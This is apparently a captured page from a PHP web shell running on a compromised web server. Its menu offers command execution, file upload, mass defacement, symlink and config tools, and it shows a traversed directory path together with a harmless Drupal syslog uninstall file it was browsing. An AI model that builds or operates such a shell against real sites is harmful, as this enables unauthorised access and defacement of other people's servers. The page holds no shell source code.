OFF | cURL : OFF | WGET : ON | Perl : ON | Python : OFF Directory (0775) : /var/www/html/hpsc/../smartlab/bib/../../marc-drupal/modules/syslog/ |
Home | ☍ Command | ☍ Upload File | ☍Info Server | ☍ Buat File | ☍ Mass deface | ☍ Jumping | ☍ Config | ☍ Symlink | ☍ About |
---|
<?php /** * @file * Install, update and uninstall functions for the syslog module. */ /** * Implements hook_uninstall(). */ function syslog_uninstall() { variable_del('syslog_identity'); variable_del('syslog_facility'); variable_del('syslog_format'); }